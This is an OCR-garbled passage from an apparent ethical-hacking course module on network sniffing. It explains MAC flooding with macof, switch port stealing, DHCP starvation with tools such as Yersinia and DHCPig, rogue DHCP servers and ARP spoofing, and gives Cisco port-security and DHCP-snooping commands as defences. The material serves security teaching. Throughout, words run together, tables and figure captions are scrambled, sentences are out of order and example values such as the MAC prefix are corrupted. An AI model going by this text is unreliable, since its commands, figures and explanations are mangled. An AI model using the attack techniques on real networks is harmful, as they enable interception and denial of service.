networks.LIobtainsdatafroma communication networkfor analysis or evidence.Thisis useful
i n activities like infrastructuremanagement and protection,as well as cybersecurity-related
issues. Here,the network operator or service providerlegallysanctions access to private
networkdatafor monitoring privatecommunications like telephone callsandemailmessages.
Suchoperations are carried out bylawenforcement agencies (LEAS).
Thistypeof interception is necessary onlyto monitor messages exchanged on suspicious
channelsi n which the users are engaged i n illegal
activity.Countries aroundthe world are
makingstridesto standardize thistypeof procedure for interception.
Thefigure showsthe telco/ISPlawfulsolutionprovided bythe DecisionComputer Group. The
solutionconsists of one tap/access switchandmultiple systemsfor the reconstruction of
intercepteddata.Thetap/access switchcollectstrafficfromthe Internet service provider (ISP)
network,sorts thetrafficbyIP domain, andserves it to E-Detective (ED) systemsthatdecode
and reconstruct the intercepted
traffic into its original format.Thetool performsthiswith the
helpof supportingprotocols suchas POP3, IMAP,SMTP,P2P and FTP,and telnet. The
CentralizedManagement Server(CMS) manages all the EDsystems.
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
a 7
a| Creuermee
a Dette
ogee fn
MAC Attacks
SniffingTechnique:
use various sniffing
Attackers techniques,
suchas MACattacks,
DHCPattacks,
ARPpoisoning,
spoofing
attacks,
and ONSpoisoning, to stealand manipulate
sensitive data.Attackersuse
thesetechniques networkbyreading
to gaincontrolover a target datapackets
captured and
thenusing that informationto breakinto the network.
MACattacksor MACflooding.
Thissection discusses Attackersuse the MACflooding
technique
toforcea switchto act as a hub,so that they
c an easily
sniffthetraffic.
ical andCountermensores
Mackin ©by E-Comel
Copyright
MACAddress/CAMTable
CAM
Table
255 0488d24.123¢ Gi/2
com te DynamicYes 0
5 as23dl45astsDymamicYes 0 Gi2/s
alar|oe]as|oe]oal alex
5 e232sert8e3 Dynamic Yes 0 Git/s
all
MACAddress
Fa
AMAC addressuniquely identifieseachnodeof a network.Eachdevicein the networkhasa
MAC address with a physical
associated porton the networkswitch, whichmakesi t possibleto
designate a specific
singlepointof the network.MACaddresses are usedas networkaddresses
for most IEEE802 networktechnologies, includingEthernet.Logically,
the MAC protocol
i n the
(SI referencemodelu sesMACaddresses for informationtransfer.
AMAC addresscomprises48 bitsthat are splitinto two sections, eachcontaining 24 bits.The
firstsection contains the ID numberofthe organizationthatmanufactured theadapter andis.
calledthe organizationally uniqueidentifier(OUI).Thenext sectioncontains the serialnumber
assigned to the NIC adapter andis calledthe NIC specific.
TheMACaddress contains 12-digit
hexadecimalnumbers, dividedinto threeor six groups.The
first six digits
indicatethe manufacturer,
whilethe next six digitsindicatethe adapter’s
serial
number.Forexample, consider
the MACaddressD4-BE-D9-14-C8-29. Thefirstsix digits,
i.e.,
DA4BEDS, indicatethe manufacturer(Dell,
Inc.),and the next six digits,14C829, indicatethe
of
serialnumber theadapter.
ical andCountermensores
Mackin ©by E-Comel
Copyright
3 Bytes 3 Bytes
Organizationally
Unique NetworkInterface
dentitier (OU!) contr
ler(NIC)
Specific
|a8 a7 a6 aS a4 a3 a2 al
0: Unicast
1: Multicast
0: Globally
unique
1: Locally
administered
MACaddress
Figure8.15:
CAMTable
‘A
CAM table is a dynamic
table of fixed-size.It stores informationsuchas MACaddresses
available
ports
o n physical along
sendsdata to anothermachinei n a network,
searches
associated
with VLANparameters
the data passesthrough
for the destinationMACaddress(located i n the Ethernetframe)
with
them. Whena machine
the switch.Theswitch
i n its CAMtable,
and
once the MACaddress it forwards
i s found, data to the machinethrough the portwith which
the MAC addressis bound.Thismethodof transferring data i n a switchednetwork is more
secure thanthat of a hub-based network,in whichthe hubforwards the incomingtrafficto all
‘the
machines i n the network.
ical andCountermensores
Mackin ©by E-Comel
Copyright
HowCAMWorks
a]
~ =. i 2
a
seas
ee Hace
How CAMWorks
A CAMtable refersto the dynamic formof content andworkswith an Ethernetswitch.The
Ethernetswitchmaintains connections betweenports, andthe CAM table keeps trackof MAC
MachineA broadcasts
an ARPrequestto theswitch.Therequest contains the IPaddress
of the
targetmachine(Machine8), alongwith the source machine's (Machine A)MAC and IP
addresses.
Theswitchthen broadcasts
this ARPrequestto all the hostsi n the networkand
for
waits the reply.
en sl
8.16:Working
Figure
AARP
for 8
ofCAMtablestep-1
ical andCountermensores
Mackin ©by E-Comel
Copyright
Machine the target/destination
B possesses so it sendsan ARPreply
IP address, along
with its
MAC address.TheCAM table stores this MACaddressalong with the port on whichthis
machine
is connected
of CAMtablestep:2
8.17Working
Figure
Nowthe connection is successfully
established,andMachineA forwardsthe traffi
8,whileMachineC is unableto see thetrafficflowing
betweenthem.
TraficA >o
Figure
of
CAM
8.18:Working table step'3
ical andCountermensores
Mackin ©by E-Comel
Copyright
WhatHappens
When a CAMTableIs Full?
wl change
“This
ikeshut
up
|@OncetheCAMtablefils
on
a ARP
theBehavior
ste, addtional
ofthe switchto resettits
requesttrafic floods
learning broadcasting
mode, every
on
everyport
on
theswitch
port
‘This
attackw l
also of
filltheCAMtables adjacent
switches
8
wh
Happens
‘What when a CAMTable is Full?
discussed,
‘As a CAMtable contains networkinformationsuchas MACaddresses
availableon
physical
switchportsand associated A CAM table’s
VLAN parameters. limited size rendersit
susceptibleto attacksfromMACflooding, whichbombardsthe switchwith fake source MAC
addressesuntil the CAMtable is full. Thereafter,
the switchbroadcasts all incomingtraffic to all
ports.Thiscausesthe switchto reset to its learningmode,causingthe switchto broadcaston
everyportsimilarto a hub,thereby enabling
the attackerto monitor the framessent fromthe
Victimhostto
adjacent
switches
another
hostwithoutanyCAMtableentry.
This
attack
also
fills tables theCAM of
figure
‘The illustrateshow a CAM table can befloodedwith fake MAC addresses
to monitor the
framessent fromthe victim hostto anotherhostwithout anyCAMtable entry.
Yison
Poret
3
es
>e
wh
gee
Zion Ports Bh me
8.19:Flooding
Figure a CAM
table
ical andCountermensores
Mackin ©by E-Comel
Copyright
MACFlooding
[©MAC ondng thelooding CAM
involves
tablewith fakeMACaddress of
the
and pals unt Ris
‘Mac
FloodingSwitches with macof
mac Unto
coeds random
tht pat oftheei
the attackerscan
network, and
sniffthewai easly ysending CAM sore bles [131,000
1ods thesite’
bogus
MACerie
MAC Flooding
MACflooding is a techniqueusedto compromise the security
of networkswitchesthat connect
networksegments or devices.
Attackers use the MACfloodingtechniqueto forcea switchto
act as a hubso that theycan easily
sniffthetraffic.
In a switchednetwork, an Ethernetswitch contains a 2 CAMtable that stores all the MAC
addresses of devicesconnectedin the network.A switchacts as an intermediate device
betweenone or more computers i n a network.It looksfor Ethernetframes, whichcarry the
destination MACaddress; then,it talliesthisaddress withthe MACaddressi n its CAMtableand
forwardsthe traffic to the destinedmachine.Unlikea hub,whichbroadcasts data across the
network, a switch sendsdataonly to theintended recipient.Thus, a switchednetworkis more
secure compared to a hubnetwork.However, the size of the CAMtable is fixed, and as it can
store only a limitednumberof MAC addresses i n it, an attackermay sendnumerous fake MAC
addressto the switch,No problem occurs until the MACaddresstable is full. Oncethe MAC
addresstable is full,any further requests
fail-open mode,the switchstarts behaving
may forcethe
switchto enter fail-open
like a hubandbroadcasts
all the portsi n the network.Theattackerthen changes his/her
mode.In the
incomingtraffic through
machine’s
NIC to promiscuous
modeto enablethe machineto accept all the trafficentering i t. Thus,attackerscan sniffthe
traffic easily
andstealsensitive information.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Attacker
Switches
MacFlooding withmacof
820:
Figure MACfooting
Source:https://monkey.org
thereby
a
macofis Unix/Linux
facilitating
sniffing. Thistool floodsthe switch’s
floods
tool that is a partof the dsniffcollection.It
randomMACandIP addresses, causingsome switches the localnetworkwith
to fail and open in repeating
CAMtables(131,000
mode,
per min)by
sendingforged MACentries. When the MACtablefills up, andthe switchconverts to hub-like
operation,a n attackerc an monitor thedatabeing broadcast.
821:
Figure MACflooding
using
ical andCountermensores
Mackin ©by E-Comel
Copyright
SwitchPortStealing
tte
ibe seatcir te oes age
ces mm
on
SwitchPort Stealing
Theswitchportstealing
sniffing
technique
usesMACflooding
to sniffthe packets.
Theattacker
floodsthe switchwith forged gratuitous ARPpackets with the targetMACaddress as the source
and his/her own MACaddress a s the destination.A race conditionof the attackers flooded
packets andtarget hostpackets will occur, andthus, the switchhasto change its MAC address
to bind constantly betweentwo differentports.In this case,if the attackeris fast enough,
he/she will ableto directthe packets intendedfor the targethosttowardhisswitchport. Here,
the attackermanages to stealthe targethostswitchportandsendsan ARPrequest to this
switchportto discoverthe target host’s Whenthe attackergetsan ARPreply,
IP address. this
indicatesthatthetargethost'sswitchportbinding hasbeenrestoredandtheattackercan now
sniffthe packets sent towardsthe targeted host.
ical andCountermensores
Mackin ©by E-Comel
Copyright
2 Switch
Layer
‘Target
Attacker
Logical
Connection
RealConnection
gure 8:22:Switchportstealing
Assumethat thereare three machinesi n a network:Host A, the target’s
Host 8, andthe
attacker'sHost C.
Machine
Host
A
MACAddress
aa-bb-cc-dd-ee-ff
Address
WP
10.901
Host
8
Host
C
bb-ccxdd-ee-tfag
codd-ee-f-gg-hh
10.002
10.90.38
Table
of
three 82 Details hosts
ARPcacheandMACtable contain the following
Theswitch’s
in a network
values
MACTable
| Host
Address|
Vian
255,
MAC
A
Type
aabbceddee-ff
Learn
10.0.0.1
5
5
Host
Host || 8
¢
bb-ccddeesfee 1000.2
coddee-ffgg-hh 100.03
Table
£3:MACtable
ical andCountermensores
Mackin ©by E-Comel
Copyright
ARPCache
Mac
aa-bbccddeett
boce-ddeetheg
co-dd-ee-fh-eg-hh
“abe
8.4 ARPcache table
is a sniffing
1. Switchportstealing usedbyan attackerwhospoofs
technique boththe IP
addressandthe MACaddress machine(Host
of thetarget 8).
Machine MACAddress IPAddress
|
Host
Host8
aa-bb-ce-dd-ee-ff
bb-ccdd-eefrag
10.0.0.
1000.2
Host ¢ bb-codd-ee-fhge
Table
85: Switeh
10.0.0.2
with aspoofed
updated entry
The attacker'smachineruns a sniffer that turns the machine’sNIC adapter to
promiscuousmode.
HostA,associated withthe IP address wants to communicate with Host8,
(10.0.0.1),
associatedwith the IP address(10.0.0.2).
Therefore,host A sendsan ARP request(|
want to communicatewith 10.0.0.2,Whatis the MACaddress of 10.0.0.27)
Theswitchbroadcasts
thisARPrequest
to all themachines
i n thenetwork.
BeforeHost 8 (thetargetmachine)
can respond to the ARP request,
the attacker
to theARPrequest
responds an ARPreply
bysending the spoofed
containing MACand
IPaddresses(Iam 10.0.0.2,
andmy MACaddressis bb-cc-dd-ee-ff-gg),
Theattackercan achievethis bylaunching
an attacksuchas denialof service (DoS)
on
HostB,whichslowsdownits response.
NowtheARPcachei n the switchrecordsthe spoofed
MACandIPaddresses.
® mac
10001
100002
|| aabb-ccdd-eett
_bbccdd-ee-ttag
10002
|
ARPcache
Table 8.6:
bbccdd-eettag
updated
with spoofedentry
ical andCountermensores
Mackin ©by E-Comel
Copyright
MACAddress
HostA
Type
aabbccddeett
||
learn
10001
|| Age
0
|| Ports
Pora
Host8
Host€
bo-cedd-eettge10.002
bo-ccddeettge10.002
| || 0
0
|| Por®
Porc
8 .7:MACTobeupdatedwitha spoofed
Table entry
8. Now,the system willforwardall the packets
directedtowardsHostB to HostCthrough
Port C,ie., the attacker'smachine.
Thus,an attackercan
sniff
packets
the sent to Host B.
ical andCountermensores
Mackin ©by E-Comel
Copyright
How to DefendagainstMACAttacks
ee
a
a
een
Portsecurtycan b euredto restrict inbound
trafic
fromonlya elected set ofMAGaddressesandnit
MACeoding
tack
of
matchany the identifiedsecure MACaddresses
Oncethe maximum numberof secure MAC addresses on the port is set, the secure MAC
addresses tablein any of the following
are includedin an address threeways:
You can configure byusingthe switchport, port-securing
all secure MAC addresses the
interfaceconfiguration
MAC-address command,
Youcan allowthe portto dynamically
configure
secure MACaddresses
with the MAC
You can
of
addressesthe connected
configure
devices.
a number of addresses
and allow the rest to be dynamically
configured.
Port securitylimitsMACflooding sending
attacksandlocksdownports, an SNMPtrap.
shownin thefigure,
‘As the attackerfloodstheswitchCAMtableswithfakeMACaddresses
and
byturninga switchinto a hub.
thusthreatenssecurity
ical andCountermensores
Mackin ©by E-Comel
Copyright
cosetereeeee
co-cnehddasea
Figute8.23
FlodingCAMtables
the number
Asshownin the figure, of MACaddressesallowedon the switchportis limitedto
one; therefore, are recognized
the MACrequests as flooding. locksdownthe port
Port security
andsends
an
SNMP
trap.
on
‘Only
MAC Addrose
Allowed theSwitch
P ort
Configuring
PortSecurity
be
on CiscoSwitch
Source:https://www.cisco.com
Stepsto restrict trafficthrough
Te
Figure8.24
Blocking
MACflooding
a portbylimiting
and identifying
MACaddresses
of the stations
allowedto accessthe port:
1. interface interface_id
Entersinterfaceconfiguration
modeand enters the physical
interfaceto configure,
for
example,gigabitethernet
3/1.
switchportmode access
Setsthe interface
modeas access;a n interface mode(dynamic
i n thedefault desirable)
cannot beconfigured
as a secure por.
switchport port-security
Enables on theinterface.
portsecurity
switchport port-security maximum value
Setsthe maximum number
3072;the defaultis 1 of secure
for
MACaddresses the interface.Therangeis 1 to
ical andCountermensores
Mackin ©by E-Comel
Copyright
ewitchportport-security violation (restrict | shutdown)
violation {restrict
Setsthe violationmode,the action to be takenwhen a security |
shutdown) is detected.
Returnsto privileged
EXECmode.
10. show port-security address
your
Verifies entries.
to configure
Someadditionalcommands the Ciscoport
security
feature:
switchport port-security maximum 1 vlan access
Sets of
the maximum number
3072.Thedefaulti s 1
secure
for
MACaddresses the interface.Therangeis 1 to
ical andCountermensores
Mackin ©by E-Comel
Copyright
HowDHCPWorks
(©OCPservers
TCP/IP
maintain information,
configuration
@
°
DHCPAttacks
SniffingTechnique:
Thissection discusses various Dynamic Host Configuration Protocol(DHCP) attacks.ADHCP
attackis an active sniffingtechnique usedbythe attackersto stealand manipulate sensitive
data.Thissection describes howDHCP works,DHCP toolsusedforstarvation
starvation attacks,
attacks,rogue server attacks,anddifferentways to defendagainst DHCP attacks.
How DHCPWorks
is
DHCP a client-serverprotocol
that provides
the DHCPserver also provides
address,
to an IP host.In addition to the IP
an IPaddress
configuration-related
informationsuchas the default
gatewayand subnetmask.When 2 DHCPclient deviceboots up, it participates in traffic
broadcasting.
DHCP can assignIP configuration
to hostsconnecting
to a network.The distribution
of IP
configuration
to hostssimplifies
theadministrator's
workto maintain IPnetworks.
DHCPservers maintain TCP/IP configuration
information i n a databasesuchas valid TCP/IP
configuration
parameters,validIP addresses,
andduration oftheleaseofferedbytheserver. It
provides
addressconfigurationsto DHCP-enabledclientsi n the formof a leaseoffer.
‘Working
of DHCP:
1. Theclientbroadcasts
@DHCPDISCOVER/SOLICIT for DHCPconfiguration
requestasking
Information.
DHCP-relay
‘A the client requestand unicasts it
agentcaptures to the DHCPservers
available
i n thenetwork
ical andCountermensores
Mackin ©by E-Comel
Copyright
Therelay in theclient’s
DHCPOFFER/ADVERTISE
agentbroadcasts subnet.
DHCPREQUEST/REQUEST
Theclient broadcasts asking
the DHCPserver to provide
the
DHCPconfiguration
information.
TheDHCPserver sendsa unicast DHCPACK/REPLY to
message the clientwith the IP
configuration
andinformation,
Figure8.25: ofDHCP
Working
ical andCountermensores
Mackin ©by E-Comel
Copyright
DHCPRequest/Reply
Messages
DHCPRequest/Reply
Messages
A devicethat already hasan IPaddresscan use the simple request/reply exchange to obtain
otherconfiguration parameters froma DHCPserver. Whenthe DHCPclientreceives a DHCP
offer,the clientimmediately responds bysending backa DHCP request packet.Devices that are
not usingDHCPto acquireIP addresses otherconfiguration
can stillutilizeDHCP’s capabilities.A
client can broadcast@DHCPINFORM message to requestthat any availableserver send its
parameters on the usageof the network.DHCPservers respond with the requested parameters
that a
and/or default parameterscarriedin DHCPoptionsof DHCPACK message. If aDHCPrequest
comes from a hardware
address
DHCPserver can putthat IP address
is i n the DHCPserver'sreserved
not for the IP addressthat this DHCPserver offered,
backinto the pool
poolandthe requestis
the DHCPserver’s offer is invalid.The
andoffer it to anotherclient.
DHCP
va DHCPV6
| Message
Message Description
__|
DHcPDiscover Solicit
to with
Clientbroadcast
to locatetheavailable
DHCPservers
Serverto clienti n response DHCPDiscover the offerof
| ||
DHcPoFer Advertise
Request,
configuration
Client
t o
parameters
servers either(a)requesting (b)
offeredparameters,
| _|| the
leasepreviously
allocated
period address,
DHCPRequestConfirm, confirming the correctness
Rebind (c)extending
Renew,
ofthe or
DHcPRelease
| Release
|Clientto server relinquishing
case
ical
andcanceling
thenetworkaddress
N/A Reconfigure
Theclientthensendseither a renew/reply
settings.
Information-request/reply
information
or
transactionto getthe updated
| client
| __|
DHCPInform server
hasonly
local
configuration
parameters
Information Clientto
externally
network
“Request alreadythe
asking for
configured address
the
Arelay
agentsendsa relay-forward to relay to
|sryers,
directly
message messages
w/a Relay-Forward either or through
anotherrelayagent
Ni
|A Relay
Reply
server sendsa relay-reply
message thatthe relay
message to a relay
agentcontaining
agentdeliverstoa client
3
N/A
DHCPNAK ofServerto clientindicating
addresss incorrect (e.g,
that the client’s
notion the network
the clienthasmovedto a new subnet)
leasehasexpired
the client’
or
8.8:
IPv4 DHCPPacketFormat
request/reply
Table DHCP messages
with BOOTPrelay
Protocol(BOOTP)serversandDHCPclients.
messages.
thus eliminating
agents,
Thisis
the need
to change
the BOOTPclient'sinitializationsoftwareto interoperate
with DHCPservers.
‘Wane 10900)
‘Yow
addres
ADDR) W
Adress
‘ete (BOON)
foemat
6.26:1Pv8DHCPpacket
Figure
ical andCountermensores
Mackin ©by E-Comel
Copyright
Thefollowing
table detailseveryfieldoftheIPv4DHCP
message:
FIELD octets DESCRIPTION
Opcode This
contains
field
message opcode
that
represents
the message
type:opcode"1―
lent, while “2―
represents
represents
messages
sentbytheserver
responses
the
sentbythe
Length
HardwareAddress
Authority
(e.g,
Numbers
"2" (ANA)
Hardwareaddresslength
i n octets
=
10MbEthernet)
Hops DHCP
clients
In general,
the
ofagents
optionally
set thevalueto “0―;
usedto countthe number relay
forwardedthe message
however,
that
ID (X10)
Transaction number
ischosen
request by
‘A.andom
the
clientthe
andtheir responses
messages
to associate
betweena clientand
Seconds elapsed
Seconds since thecient began
theaddress
or renewalp rocess
acquisition
Flags receive set For client
Flags bytheclient; example,
if the cannot
flagsset
thenthe broadcast
unicastIP datagrams,
(CIDDR)
ClientIPAddress
YourIPAddress(VIADDR)
Usedwhenthe
ARPrequests client
addressassigned
hasan IPaddressandcan respond
to
Options
DHCP
128
Variable
of
Name the file containingBOOTP
client's boot image
Table
89: Fels
of
14 DHCPmessage
ical andCountermensores
Mackin ©by E-Comel
Copyright
DHCPStarvationAttack
theoe
Goan
Por
lee
thence
bonds ues oes
Sinemet socks
® net
eter hess
DECPStarvationAttack
In a DHCPstarvation attack,an attackerfloodsthe DHCP server bysending numerous DHCP
requests andusesall oftheavailable IP addresses
thatthe DHCPserver can issue. Asa result,
the server cannot issueany more IP addresses,
leadingto a DoSattack.Because of this issue,
validuserscannotobtainor renew
attackerbroadcasts DHCPrequests their
with spoofed
thus,theyfailto accesstheir network.An
IP addresses;
MACaddresses with the helpof toolssuchas
>
ED
out
of?
OH Server
Serverrans
* Pe;
.
% searesss to allocate
% t o validusers,
‘valid
IPaddress
o s
ay DHCPScope
10,10.10.1
10,10.10.2
Attacker
sends
many
ferent OHCP
requests
with manysource MACS
10,10,10.3
‘attackerFigure8.27:
DHCP
starvation attack
10,10.10.254
8
Module 1117
Page ical
and ©
Mackin Countermensores
Copyright
by E-Comel
StarvationAttackTools
DHCP
DHCPstarvation attacktoolssenda largenumberof requeststo a DHCPserver, leading to
exhaustionof the server'saddresspool.Subsequently,
the DHCPserver is unableto allocate
configurationsto new clients.
=
Yersinia
Source:https://sourceforge.net
Yersiniais a networktool designed to take advantage of weaknesses
i n different
network protocolslike DHCP.It pretends to be a solidframeworkfor analyzing and
thedeployed
testing networksandsystems, As showni n the screenshot,
attackers use
Yersiniato perform
a DHCP starvation attackon the targetsystem,
Figure8.2;Screenshot
ofYersinia
Someexamples
of DHCP
starvation attacktoolsare listedbelow:
+
(https://sourceforge.net)
Hyenae
+
(https://aithub.com)
dhepstary
+
(https://sourceforge.net)
Gobbler
(https://github.com)
DHCPig
Modul
8 1118
Page ical
and ©
Mackin Countermensores
Copyright
by E-Comel
DHCP ServerAttack
Rogue
‘atener
nogcompreaced
Thistle wots wth he
conection
nn nnn
ONCP taaton
nononer
a
ies
TCI etingothe ee
DHCPServerAttack
Rogue
In additionto DHCPstarvation attacks, an attackercan perform MITM attackssuchas sniffing,
attacker
‘An whosucceeds in exhausting the DHCPserver’sIP addressspacecan set up a rogue
DHCPserver on the network, whichis not underthe controlof the networkadministrator.The
rogueDHCPserver impersonates a legitimateserver and offersIP addresses
andothernetwork
informationto otherclientsi n the network, actingas a defaultgateway. Clientsconnectedto
the networkwith the addresses assigned bythe rogueserver will now becomevictims of MITM.
andother attacks, whereby packets forwardedfrom a client'smachinewill reachthe rogue
server
first.
In a rogueDHCP server attack,
rogue server can respond
actualDHCPservers respond
an
attacker
willintroducea rogueserver into thenetwork.
DHCPdiscovery
to clients’ requests.
to the request,the clientaccepts
Although
This
both the rogue and
the response that comes first. In
the case wherethe rogueserver responds earlierthanthe actualDHCP server,the clienttakes
the responseof the rogueserver. Theinformationprovided to the clientsbythis rogueserver
can disrupt
their networkaccess, causinga DoSattack,
TheDHCPresponse from the attacker'srogue DHCPserver may assign the IP addressthat
servesas a client's defaultgateway. As a result,theattacker'sIPaddress receives all the traffic
fromthe client.Theattackerthen captures all the trafficand forwardsit to the appropriate
defaultgateway. Theclientthinksthat everything
difficultfor theclientto detectfor longperiods.
is functioning
correctly.
This of attackis
type
Sometimes, the clientuses a rogue DHCP
server insteadof the standardone. Therogue server
directs
theclientto visit fakewebsites
i n an attemptto gaintheircredentials.
Modul
8 1119
Page ical andCountermensores
Mackin Copyright
©
by E-Comel
To mitigatea rogueOHCPserver attack, set the connection betweenthe interface and the
rogue server as untrusted.Thisaction will blockall incoming DHCP server messagesfromthat
interface.
Figure8.23:
DHCP
Rogue server attack
ical andCountermensores
Mackin ©by E-Comel
Copyright
How to DefendAgainst
DHCPStarvationand Rogue
Server 7
Attacks
Enable
port
security
against snooping,
CEH
athe
directed
"© to defend DHCP staratn Enable OHCP whichlows switchto accent
tics {ONCEranatcton fom uted port
How to DefendAgainst
DHCPStarvationand Rogue
ServerAttacks
DefendAgainst
DHCP
Starvation
Enableportsecurityto defend against a DHCPstarvation attack. Port security limits the
maximum number of MACaddresses on the switchport.When thelimit is exceeded,
the switch
drops subsequent
MACaddressrequests (packets)fromexternalsources,whichsafeguards the
aDHCP
server against starvation attack.
User
830: Defending
Figure 9 HCPstrvation
agninst attack
Internetwork
Operating (10S)
System SwitchCommands
Source:https://www.cisco.com
+
switchportport-security
The switchport port-security commandconfigures
the switchportparameters
to enableportsecurity.
ical andCountermensores
Mackin ©by E-Comel
Copyright
switchport port-security maximum 1
The ewitchport port-security maximum commandconfigures
the maximum
forthe port.
numberof secure MACaddresses
The ewitchportport-security maximum 1 commandconfigures
the maximum
numberofsecure MACaddresses
forthe port as 1.
ewitchportport-security violation restrict
The switchport port-security violation commandsets the violation mode
andthe necessary
action in caseof detectionof
Theswitchport port-security violation
asecurity
violation.
restrict commanddrops
packets
withunknown
s ource addresses
untila sufficient
numberof secure MACaddresses
are
removed.
switchport port-security aging time 2
The switchport port-security aging time commandconfigures
the secure
MAC
address agingtime on theport.
Theswitchport port-security aging
2 minutes.
time 2 command
sets
the agingtime as
ical andCountermensores
Mackin ©by E-Comel
Copyright
Trusted
Untretes ED)
once
baie
‘Attacker
a 8.31:Defending
Figure
Us
againstrogueserver attack
10SGlobalCommands
Source:https://www.cisco.com
to configure
Steps DHCPsnooping
1 ip dhep snooping
DHCPsnoopingglobally
Enables
ip dhep snooping vlan number [number] | vlan {vlan range}]
Enables
or disablesDHCP
snoopingon one or more VLANs.For example:
ip dhep snooping vlan 4,104
ip dhep snooping trust
Configures
the interfaceas trustedor untrusted.
ip dhcp snooping limit rate
Configures packets
the numberof DHCP persecond(pps)
that an interfacecan receive,
end
Exitsconfiguration
mode.
show ip dhcp snooping
Verifies
the configuration
AdditionalDCHP
snooping command:
no ip dhcpsnooping information option
Todisablethe insertion andthe removalof the option-82
field,u se the no ip dhep
snooping information option i n global configuration
command.To configure an
aggregation, switch to dropincoming DHCPsnooping packets with option-82
informationfrom an edge switch, IP dhcp
and use the “no snoopinginformationoption
global
allow-untrusted―configuration
in VLAN
Note: All ports the
are
command,
untrustedbydefault
ical andCountermensores
Mackin ©by E-Comel
Copyright
What Is AddressResolutionProtocol(ARP)?
es pote a eres
ashing
tomaine A] ees
ARP Poisoning
SniffingTechnique:
Thissection discussesthe ARPpoisoningtechniquegenerallyusedbyattackersto perform
sniffing
o n a targetnetwork. Using
this method,
an attackercan steal sensitive information,
preventnetworkandwebaccess,andperform DoSandMITM attacks usingsniffing,
What Is Address Resolution Protocol (ARP)?
AddressResolutionProtocol(ARP) is a statelessTCP/IP protocol
that maps IP network
addresses to the addresses (hardware addresses)used bya data link protocol. Using this
protocol,
Apart
a user can easily
obtainthe MAC addressof anydeviceon a network.
addresses.
switch,the hostmachinesalsouse the ARPprotocol forobtaining MAC
fromthe
ARPis used
by tosent.
packet
packet another
device,
the hostmachinewhenit wants senda to andhasto mention the
ofthe address
destinationMACaddressi n the Therefore,to write thedestinationMAC in
the
the packet, host machine
alsomaintainsthe MACaddress
shouldknowthe MACaddress
table(ARP table}.
destinationmachine.TheOS
of obtaining
Theprocess the MACaddressusingARPis asfollows:
=
The source machinegenerates a n ARPrequestpacket containing the source MAC
address, anddestinationIP address,
source IPaddress, andsends
i t to theswitch,
theswitchreadsthe MACaddressof the source andsearches
On receivingthe packet,
for in
thisaddress its CAMtable.
Theswitchupdates all the new entries i n it. If the entryis not found i n the table,
the
switchaddsthe MACaddressand its respective incomingport to its CAMtable and
broadcasts
the ARPrequest packetinto the network,
ical andCountermensores
Mackin ©by E-Comel
Copyright
Eachdevicein thenetworkreceives the broadcast ARPrequestpacket
andcompares
the destinationIPaddressi n the packet
with its own IPaddress.
Onlythe systemwith an IP addressthat matchesthe destination IP addressreplies
with
an
ARP
reply
TheARPreply
packet
messageis thenreadbythe switch, whichaddsthe entryto its MACtable
andforwards the message to thedestination
machine, i.e,, the machinethat sent the
ARPrequest.
Further, this machineupdates
the destinationmachine’s
IP and MAC addressentries
into its ARP table,
take
andnow communication can place.
|
want to connect
but |
to 10,10.10,3,
Malo eaaihe
ARP
REQUEST
MACadress of
10.1003,
10:10.10.10.1
needMAC address
MAC00-1420.01.23-45
ARPREQUEST
Hello, need the MAC
address
of 10,10.10.3.
>
110:10.10.102
110:1945467.10
MAC O0:Ib:s8:6442:06
ARPREQUEST
AA
sueresestsnseseseeey
10:10.10.10.3
coseeennneeeennneesens®
Estabished
‘Connection
MAC:00-14-20-01-23-47
example
Consider
an ARP
ARP 8.32:Working
Figure
that showstwo machines
of
connected
protocol
in a network.
Therespective
hostnames,
IPs,
andMACaddresses
are:
HostName
A
P
194.54.67.10
Mac
00:1b:48:64:42:64
8 192.54.67.15 00-14-20-01-23-47
Before with hostB,hostA firstchecks
communicating fora record
of hostB'sMACaddressi n
theARPcache.If hostA findsthe recordof MAC
it hasto accesshostB’s
B.Otherwise, MACaddress a address,
it
communicates
usingARPprotocol.
directly
with host
HostA queriesall the hostson the LAN.If the query were phrasedin plain
English,
it might
soundlike this: “Hello,
who is 192.54,67.15?This is 194.54.67.10. My MAC addressis
00:1b:48:64:42:e4.| needyour MACaddress.―
Here,
hostA sendsa broadcastrequestdata packet to host8. On receivingthe ARPrequest
packet,
hostB updates IP and MAC addresses,
its ARPcache tablewith hostA’s andsendsan
ical andCountermensores
Mackin ©by E-Comel
Copyright
ARPreplypacket
to hostA thatwouldbephrased
i n English
as, "Hey,
thisis 192.54.67.15;
my
MAC
is
address 00-14-20-01-23-47.―
(On receivingthe ARP reply, updates
host A its ARP cachetable with host B's IP and MAC
After establishing
addresses, thesetwo hostscan communicatewitheachother.
a connection,
Prompt
IB Command
Figure8.33:
ARPcache
ical andCountermensores
Mackin ©by E-Comel
Copyright
ARP Spoofing
Attack
‘an
be |
packetscanforgedto MowDoes
ARP
Work
Spoofing
ARPSpoofing
Attack
ARPresolvesIP addresses to the MAC(hardware) addressof the interfaceto senddata,ARP
packets can be forged to senddata to the attacker's machine. ARPspoofing involves
constructinga largenumberof forged ARPrequestand replypackets to overloada switch
Whena machine sendsa n ARPrequest, it assumesthatthe ARPreply will come fromthe right
machine.ARPprovides no means of verifying the authenticityof the responding device.Even
systemsthat have not madean ARP requestcan accept the ARP replies comingfrom other
devices,Attackersuse thisflaw in ARPto create malformedARPreplies containing spoofed IP
and MAC addresses. Assuming it to bethe legitimate ARPreply, the victim’s
computer blindly
acceptsthe ARPentryinto its ARPtable. Oncethe ARPtable is floodedwith spoofed ARP
the switchis set i n forwarding
replies, mode, andthe attackerintercepts all the datathat flows
fromthe victim’s
machinewithoutthe victim being aware ofthe attack.Attackersflooda target
computer's ARPcachewith forged entries,whichis alsoknownas poisoning.ARPspoofing is an
intermediaryforperforming attacks suchas DoS,MITM,andsessionhijacking,
HowdoesARPSpoofing
Work?
ARPspoofing
a
is a methodof attacking
sessionwithanother
requestusingthe recipient's
an EthernetLAN.When legitimate
u ser i n the same layer
IP address,
2 broadcast domain,
user initiates a
theswitchbroadcasts
while the senderwaits for the recipient
an ARP
to respond
eavesdropping
with a MACaddress.
can respond
An attacker
to the broadcast
recipient’s
ARPrequest
on thisunprotected
and replies
layer2 broadcast
to the senderbyspoofing
IP address.The attackerruns a snifferand turns the machine’s
domain
the intended
NIC adapter to
promiscuous
ARPspoofing
mode
is a methodof attacking bychanging
an EthernetLAN.It succeeds the IPaddress
of the attacker'scomputer A forged
to that of the targetcomputer. ARP request and reply
8
Module 1127
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
can finda place
